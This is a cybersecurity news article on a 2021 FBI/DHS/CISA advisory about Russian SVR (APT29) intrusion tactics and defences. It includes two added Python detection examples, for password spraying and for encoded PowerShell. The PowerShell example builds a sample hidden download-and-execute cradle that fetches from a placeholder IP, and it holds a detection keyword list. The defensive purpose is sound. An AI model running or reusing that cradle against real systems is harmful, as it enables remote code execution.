Threat Intelligence

4/26/2021 07:20 PM

US Urges Organizations to Implement MFA, Other Controls to Defend Against Russian Attacks

Actors working for Moscow's Foreign Intelligence Service are actively targeting organizations in government and other sectors, FBI and DHS say.

The FBI, the Department of Homeland Security (DHS), and the Cybersecurity & Infrastructure Security Agency (CISA) are urging US organizations to implement multifactor authentication and other defensive mechanisms to protect against threat activity by Russia's Foreign Intelligence Service (SVR).

In a new joint advisory out today, the three entities warn government agencies, think tanks, information technology companies, and policy analysis organizations in particular to watch out for attacks from APT29, a threat group that they describe as working for the SVR.


The alert does not point to any specific new and recent threats or attacks from APT29 (aka Cozy Bear, Dukes, and Yttrium) targeting organizations in these sectors. But it does note the longstanding threat the group has posed to US organizations and the group's use of customized tools to maximize stealth and to move laterally within victim networks. Since at least 2018, the group has shifted from predominantly targeting on-premises assets to targeting cloud-hosted email and other cloud resources, the three agencies say.

"[SVR] will continue to seek intelligence from US and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks," the alert notes.

This is the second US government warning about SVR activity in two weeks. On April 15, shortly after the Biden administration formally attributed the SolarWinds compromise to the SVR, the FBI, DHS, and CISA released an advisory warning that the Russian intelligence service was exploiting five known, already-patched vulnerabilities in VPN appliances and other widely deployed products to compromise US organizations.

That advisory highlighted how, in addition to the SolarWinds supply chain attack, the SVR was responsible for several other recent campaigns, including several targeted attacks on COVID-19 research facilities.

Organizations should pay attention to advisories such as these that offer information on adversary tradecraft and recommendations for addressing threats that an adversary might present, says Sean Nikkei, senior cyber-threat intelligence analyst at Digital Shadows. "We have to assume that there are ongoing or will be new campaigns due to the nature of intelligence collection for strategic goal," Nikkei says.

"The information can certainly help any organization because it gives them a chance to update and vet their signatures, talk to their vendors, and think about how they might be targeted," he says.

The new advisory highlights three tactics that SVR and threat groups working for it have been observed using in recent attacks: password spraying, zero-day exploits, and the use of a malware tool set called WellMess for enabling encrypted command-and-control sessions on an infected system.

The advisory points to a 2018 compromise in which SVR operators used password spraying to find an administrator account with a weak password. The spraying was conducted "low and slow": each attempt came from one of a large number of IP addresses associated with business, residential, and mobile accounts in the victim's own region, so that no single source tripped a lockout or rate-limit threshold and the traffic blended in with legitimate logins. Because the signal is spread across many accounts and many sources rather than concentrated on one of either, per-IP and per-account thresholds alone will miss it; defenders have to look at failure counts aggregated across the whole tenant. Once they had the admin account, the attackers modified permissions and used that access to read the mailboxes of specific people of interest, according to the joint advisory.
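The account-spread pattern described above can be surfaced from ordinary authentication logs. The following Python is an added illustration, not code from the advisory or from Dark Reading; it assumes a simplified, constructed log format of "timestamp user source_ip result" (Windows 4625/4771 events, Azure AD sign-in logs, or VPN logs carry the same fields under other names) and uses made-up thresholds. It distinguishes a spray (many accounts, few failures each, many source IPs) from a classic brute force (one account, many failures, one source), which is what a per-account lockout already catches.

```python
"""Flag 'low and slow' password spraying by aggregating failures per time
window across accounts and source IPs. Added example; the log format,
sample data and thresholds are all constructed for illustration."""
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample: one spray hour (8 accounts, 8 IPs, 1 failure each)
# ending in a success against 'admin', followed by ordinary user traffic.
SPRAY_LOG = """\
2021-04-20T01:00:00 alice 203.0.113.10 FAIL
2021-04-20T01:04:00 bob 198.51.100.7 FAIL
2021-04-20T01:09:00 carol 192.0.2.44 FAIL
2021-04-20T01:13:00 dave 203.0.113.88 FAIL
2021-04-20T01:18:00 erin 198.51.100.23 FAIL
2021-04-20T01:22:00 frank 192.0.2.9 FAIL
2021-04-20T01:27:00 grace 203.0.113.150 FAIL
2021-04-20T01:31:00 heidi 198.51.100.200 FAIL
2021-04-20T01:36:00 admin 192.0.2.77 SUCCESS
2021-04-20T02:00:00 alice 10.0.0.5 SUCCESS
2021-04-20T02:05:00 alice 10.0.0.5 FAIL
2021-04-20T02:06:00 alice 10.0.0.5 SUCCESS
"""

# Constructed contrast: a brute force on one account from one IP. Noisy,
# but it is not a spray and a per-account lockout already handles it.
BRUTE_LOG = """\
2021-04-20T03:00:00 alice 203.0.113.10 FAIL
2021-04-20T03:01:00 alice 203.0.113.10 FAIL
2021-04-20T03:02:00 alice 203.0.113.10 FAIL
2021-04-20T03:03:00 alice 203.0.113.10 FAIL
2021-04-20T03:04:00 alice 203.0.113.10 FAIL
2021-04-20T03:05:00 alice 203.0.113.10 FAIL
2021-04-20T03:06:00 alice 203.0.113.10 SUCCESS
"""


def parse(log_text):
    """Parse the constructed 'timestamp user src_ip result' lines into
    (datetime, user, ip, result) tuples, sorted by time."""
    events = []
    for line in log_text.strip().splitlines():
        ts, user, ip, result = line.split()
        events.append((datetime.fromisoformat(ts), user, ip, result))
    return sorted(events)


def find_spray_windows(events, window=timedelta(hours=1), min_users=5,
                       max_fails_per_user=2, min_ips=3):
    """Bucket events into fixed windows and flag a window as a spray when
    failures touch >= min_users accounts, no account fails more than
    max_fails_per_user times, and the failures come from >= min_ips sources.
    Returns one summary dict per flagged window, including which accounts
    logged in successfully during it (the ones to review first)."""
    if not events:
        return []
    t0 = events[0][0]
    buckets = {}
    for ts, user, ip, result in events:
        idx = (ts - t0) // window          # timedelta // timedelta -> int
        buckets.setdefault(idx, []).append((ts, user, ip, result))

    hits = []
    for idx in sorted(buckets):
        evs = buckets[idx]
        fails_per_user = Counter(u for _, u, _, r in evs if r == "FAIL")
        fail_ips = {ip for _, _, ip, r in evs if r == "FAIL"}
        if not fails_per_user:
            continue
        if (len(fails_per_user) >= min_users
                and max(fails_per_user.values()) <= max_fails_per_user
                and len(fail_ips) >= min_ips):
            hits.append({
                "window_start": t0 + idx * window,
                "distinct_users": len(fails_per_user),
                "distinct_ips": len(fail_ips),
                "failures": sum(fails_per_user.values()),
                "successes": sorted({u for _, u, _, r in evs if r == "SUCCESS"}),
            })
    return hits


if __name__ == "__main__":
    for name, log in (("spray", SPRAY_LOG), ("brute", BRUTE_LOG)):
        print(name, find_spray_windows(parse(log)))
```

The thresholds are the tunable part: a patient actor can spread the same spray over days, so in practice you run the same aggregation over a long window (a day or a week) as well as an hourly one, and you baseline the normal number of distinct accounts that fail per window for your tenant size before choosing `min_users`.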

In another incident, SVR actors exploited a then-unpatched vulnerability (CVE-2019-19781) in Citrix Application Delivery Controller (ADC) to get into an enterprise network and harvest credentials, which they then used to reach other systems on the network. They established footholds on several systems that were not configured to require multifactor authentication. The organization eventually discovered the intrusion and evicted the attackers, but they regained access through the same Citrix flaw; that initial access point was then found and closed as well, according to the advisory. The lesson the advisory draws is that eviction has to include the original entry point, not just the footholds built from it.

The FBI, DHS, and CISA alert describes the WellMess malware family as being used in targeted attacks on COVID-19 research facilities. "These implants allow a remote operator to establish encrypted command and control (C2) sessions and to securely pass and execute scripts on an infected system," the advisory notes.

Multiple Recommendations
The three entities urge organizations to consider mandating the use of multifactor authentication for all on-premises and remote users and administrators. They also recommend that organizations allow access to admin systems and functions only from known IP addresses, conduct regular audits of account permissions and mailbox settings, and implement strong passwords.

Because a zero-day cannot be patched in advance, the advisory's guidance for that scenario is about catching post-exploitation activity: monitor for evidence of encoded PowerShell commands and for the use of Nmap and other network scanning tools, and make sure endpoint security and monitoring systems are actually enabled on the hosts an attacker would land on.
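Encoded PowerShell is worth a concrete look because the encoding hides the script from naive command-line matching. The following Python is an added example, not from the advisory or this article: it finds an `-EncodedCommand` argument (and the shortened forms `-e`, `-ec`, `-enc` and longer prefixes that powershell.exe accepts) in a process command line such as the CommandLine field of a Sysmon Event ID 1 or Windows 4688 record, decodes the Base64-wrapped UTF-16LE payload, and scores the decoded script against a small, assumed indicator list. The sample command lines and the indicator list are constructed for illustration; the encoding helper exists only to build those samples.

```python
"""Decode and triage -EncodedCommand PowerShell invocations from process
command lines. Added example; sample command lines and the indicator
list are constructed, not taken from the advisory."""
import base64
import re

# powershell.exe resolves any unambiguous prefix of -EncodedCommand, and
# -ec is a commonly seen alias. Assumption: this set mirrors what the
# binary accepts; extend it if you see misses in your own telemetry.
_ENC_PREFIXES = {"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}

# Constructed, deliberately small indicator list for the decoded script.
SUSPICIOUS = [
    r"invoke-expression", r"\biex\b", r"downloadstring", r"net\.webclient",
    r"frombase64string", r"invoke-webrequest", r"start-bitstransfer",
    r"reflection\.assembly", r"-nop\b", r"hidden", r"bypass",
]


def extract_encoded(cmdline):
    """Return the decoded script if cmdline carries an encoded-command
    switch followed by a valid Base64/UTF-16LE blob, otherwise None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):          # switch needs a value after it
        if tok[:1] not in ("-", "/"):
            continue
        if tok.lstrip("-/").lower() not in _ENC_PREFIXES:
            continue
        blob = tokens[i + 1].strip("\"'")
        try:
            raw = base64.b64decode(blob, validate=True)
            return raw.decode("utf-16-le")
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
            return None
    return None


def triage(cmdline):
    """None for non-encoded command lines; otherwise the decoded script,
    the indicators it matched, and an alert flag."""
    decoded = extract_encoded(cmdline)
    if decoded is None:
        return None
    hits = [p for p in SUSPICIOUS if re.search(p, decoded, re.I)]
    return {"decoded": decoded, "indicators": hits, "alert": bool(hits)}


def encode_ps(script):
    """Build an -EncodedCommand value the way an operator would
    (Base64 over UTF-16LE). Used here only to construct sample lines."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines: plain, benign encoded, hostile encoded
# with mixed-case switch, and a non-encoded script run.
SAMPLE_CMDLINES = [
    'powershell.exe -NoProfile -Command "Get-Service"',
    "powershell.exe -e " + encode_ps("Get-Date"),
    "powershell.exe -nop -w hidden -EnCodedCoMmAnD " + encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage(line))
```

Two caveats a practitioner would add: the outer command line (`-w hidden`, `-nop`, `-noni`) is itself a signal and should be scored alongside the decoded body, and the decoded script may contain a second layer (`FromBase64String` feeding `Invoke-Expression`), so the indicator list is there to prioritise, not to decide; anything encoded that is not from a known administrative job is worth a human look.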

Defending against supply chain attacks such as the one that affected SolarWinds' customers can be tricky, the advisory concedes. But organizations can mitigate risk by implementing practices such as log file auditing to identify attempts to access privileged certificates; deploying controls for identifying suspicious behavior; implementing behavioral monitoring; and requiring authentication for certain user activities.

Dirk Schrader, global vice president of security research at New Net Technologies, says advisories such as the one released today help organizations get a better picture of the real-life operations of an advanced adversary. However, too many of them can end up being a distraction, he says. "Frequent advisories will lead to many questions from senior management and executive boards about the status of an organization in the light of those," he says. "Cybersecurity teams will be — at least — required to balance these requests with their regular work."

Many of the recommendations in these advisories, such as enabling multifactor authentication and not allowing remote logins from unknown IP addresses, are things organizations should already be doing, says Joseph Neumann, cyber executive advisor at Coalfire.

These advisories also just speak to the tactics, techniques, and procedures, Neumann notes. "These are helpful to a degree that allows administrators and defenders to know where to start their initial looks," he says. "But [they] fall short of giving [organizations] data that they can plug in to security tools to begin immediate automated remediations and mitigations."

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication.